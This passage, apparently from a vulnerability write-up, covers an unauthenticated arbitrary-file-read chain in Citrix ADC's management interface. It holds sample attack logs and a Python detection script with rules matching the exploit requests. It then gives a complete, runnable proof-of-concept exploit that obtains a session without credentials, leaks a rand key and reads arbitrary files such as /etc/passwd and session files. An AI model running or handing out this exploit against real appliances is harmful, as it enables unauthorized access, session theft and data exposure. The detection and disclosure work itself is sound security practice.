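203.0.113.7 - - [12/Jul/2020:07:54:31 +0000] "GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1" 302 416 "-" "python-requests/2.20.0"
203.0.113.7 - - [12/Jul/2020:07:54:35 +0000] "GET /menu/stc HTTP/1.1" 206 15501 "-" "python-requests/2.20.0"
203.0.113.7 - - [12/Jul/2020:12:27:04 +0000] "POST /rapi/filedownload?filter=path:%2Fvar%2Fnstmp HTTP/1.1" 406 512 "-" "python-requests/2.20.0"
203.0.113.7 - - [12/Jul/2020:12:30:33 +0000] "POST /rapi/filedownload?filter=path:%2Fvar%2Fnstmp%2Fsess_6c5c31300c22b200f0273e7a13be47cb HTTP/1.1" 406 2162 "-" "python-requests/2.20.0"
203.0.113.7 - - [12/Jul/2020:12:35:05 +0000] "POST /rapi/uploadtext HTTP/1.1" 200 34 "https://citrix.local/menu/neo" "Mozilla/5.0"
203.0.113.7 - - [12/Jul/2020:12:37:56 +0000] "PUT /nitro/v1/config/systemuser HTTP/1.1" 200 57 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Jul/2020:12:55:27 +0000] "POST /nitro/v1/config/systemuser_systemcmdpolicy_binding HTTP/1.1" 201 57 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Jul/2020:13:01:10 +0000] "GET /menu/neo HTTP/1.1" 200 9012 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Jul/2020:13:02:44 +0000] "POST /rapi/filedownload?filter=path:%2Fvar%2Fnslog%2Fns.log HTTP/1.1" 406 80412 "https://citrix.local/menu/neo" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def _q(query, key, value):
    return value in query.get(key, [])


# (rule name, accepted methods, exact path, predicate over the percent-decoded query)
RULES = [
    ('pcidss_report_session', {'POST'}, '/pcidss/report',
     lambda q: _q(q, 'sid', 'loginchallengeresponse1requestbody')),
    ('menu_ss_force_setup', {'GET'}, '/menu/ss',
     lambda q: _q(q, 'force_setup', '1')),
    ('rapi_filedownload_path', {'POST'}, '/rapi/filedownload',
     lambda q: any(v.startswith('path:') for v in q.get('filter', []))),
    ('rapi_uploadtext', {'POST'}, '/rapi/uploadtext', lambda q: True),
    ('nitro_systemuser_change', {'POST', 'PUT'}, '/nitro/v1/config/systemuser',
     lambda q: True),
    ('nitro_cmdpolicy_binding', {'POST'},
     '/nitro/v1/config/systemuser_systemcmdpolicy_binding', lambda q: True),
]


def classify(line):
    """Return a hit dict for a request matching one of RULES, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m['target'])
    query = parse_qs(url.query, keep_blank_values=True)   # decodes %2F back to /
    for name, methods, path, pred in RULES:
        if m['method'] in methods and url.path == path and pred(query):
            hit = {'rule': name, 'ip': m['ip'], 'ts': m['ts'], 'status': int(m['status'])}
            if name == 'rapi_filedownload_path':
                # a successful read still answers 406 (0x05/0x06): do not key on status
                hit['file'] = query['filter'][0][len('path:'):]
                hit['session_theft'] = hit['file'].startswith('/var/nstmp')
            return hit
    return None


def detect(log_text):
    """Return (all hits, {client: sorted rules}) for clients that show the
    unauthenticated entry point followed by a file read, i.e. the pre-auth chain."""
    hits = [h for h in map(classify, log_text.splitlines()) if h]
    rules_by_ip = defaultdict(set)
    for h in hits:
        rules_by_ip[h['ip']].add(h['rule'])
    chains = {ip: sorted(r) for ip, r in rules_by_ip.items()
              if 'pcidss_report_session' in r and 'rapi_filedownload_path' in r}
    return hits, chains


if __name__ == '__main__':
    all_hits, chain_clients = detect(SAMPLE_LOG)
    for h in all_hits:
        print(h)
    print('pre-auth chain from:', chain_clients)
```

`GET /menu/stc` is deliberately not a rule: it is an ordinary GUI page, and on its own it says nothing. The `pcidss_report_session` hit alone is already worth an alert, since nothing legitimate sends that request with that `sid`.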
    
    ### PoC
    
        #!/usr/bin/env python3
        # PoC for steps 0x01-0x06: unauthenticated SESSID -> fixed session -> rand
        # -> arbitrary file read through /rapi/filedownload.
        # usage: python3 poc.py http://target:9080
        # set PROXY=http://127.0.0.1:8080/ to route the traffic through Burp.

        import os
        import random
        import string
        import sys
        from urllib.parse import quote

        import requests

        requests.packages.urllib3.disable_warnings()

        # The proxy is optional; the original hard-coded Burp on 127.0.0.1:8080
        # and therefore failed whenever no proxy was listening.
        PROXIES = ({"http": os.environ["PROXY"], "https": os.environ["PROXY"]}
                   if os.environ.get("PROXY") else None)


        def random_string(length=8):
            chars = string.ascii_letters + string.digits
            return ''.join(random.choice(chars) for _ in range(length))


        def create_session(base_url, session):
            # 0x01 / 0x04: the failing login challenge still hands out a SESSID cookie
            url = '{0}/pcidss/report'.format(base_url)
            params = {
                'type': 'allprofiles',
                'sid': 'loginchallengeresponse1requestbody',
                'username': 'nsroot',
                'set': '1',
            }
            headers = {
                'Content-Type': 'application/xml',
                'X-NITRO-USER': random_string(),
                'X-NITRO-PASS': random_string(),
            }
            data = '<appfwprofile><login></login></appfwprofile>'
            session.post(url=url, params=params, headers=headers, data=data,
                         verify=False, proxies=PROXIES)
            return session


        def fix_session(base_url, session):
            # 0x02: initialise the session for username nsroot
            url = '{0}/menu/ss'.format(base_url)
            params = {'sid': 'nsroot', 'username': 'nsroot', 'force_setup': '1'}
            session.get(url=url, params=params, verify=False, proxies=PROXIES)


        def get_rand(base_url, session):
            # 0x03: the statistics page leaks "var rand", the value the rand_key header expects
            url = '{0}/menu/stc'.format(base_url)
            r = session.get(url=url, verify=False, proxies=PROXIES)
            for line in r.text.split('\n'):
                if 'var rand =' in line:
                    return line.split('"')[1]
            return None


        def is_download(r):
            # A successful read is still a 406; the download headers seen in 0x05/0x06
            # are the real success signal.
            return (r.status_code == 406 and 'Content-Disposition' in r.headers
                    and r.headers.get('Accept-Ranges') == 'bytes'
                    and r.headers.get('Pragma') == 'private')


        def read_file(base_url, session, rand, path):
            # 0x05 / 0x06: the path goes into filter=path:<urlencoded path>; slashes must be encoded
            url = '{0}/rapi/filedownload?filter=path:{1}'.format(base_url, quote(path, safe=''))
            headers = {
                'Content-Type': 'application/xml',
                'X-NITRO-USER': random_string(),
                'X-NITRO-PASS': random_string(),
                'rand_key': rand,
            }
            data = '<clipermission></clipermission>'
            r = session.post(url=url, headers=headers, data=data, verify=False, proxies=PROXIES)
            return r.text if is_download(r) else None


        def do_lfi(base_url, session, rand, first_path):
            # Interactive loop; the original re-used the first response's headers for
            # every later check, so failures after the first file went unnoticed.
            path = first_path
            while True:
                content = read_file(base_url, session, rand, path)
                if content is None:
                    print('[+] Error! (no download headers for {0})'.format(path))
                else:
                    print('[+] Send Success!')
                    print('_' * 80, '\n\n')
                    print(content)
                    print('_' * 80)
                path = input('\n[+] Set File= ')


        def main(base_url, first_path):
            print('[-] Creating session..')
            session = requests.Session()
            create_session(base_url, session)
            print('[+] Got session: {0}'.format(session.cookies.get_dict().get('SESSID')))

            print('[-] Fixing session..')
            fix_session(base_url, session)

            print('[-] Getting rand..')
            rand = get_rand(base_url, session)
            print('[+] Got rand: {0}'.format(rand))
            if rand is None:
                sys.exit('[!] no "var rand" in /menu/stc; the target is probably not vulnerable')

            print('[-] Re-breaking session..')
            create_session(base_url, session)

            print('[-] Getting file..')
            do_lfi(base_url, session, rand, first_path)


        if __name__ == '__main__':
            if len(sys.argv) != 2:
                sys.exit('usage: {0} http://target:9080'.format(sys.argv[0]))
            # e.g. /etc/passwd or /var/nstmp; read_file() percent-encodes the slashes
            main(sys.argv[1].rstrip('/'), input('[+] Set File= '))
    
    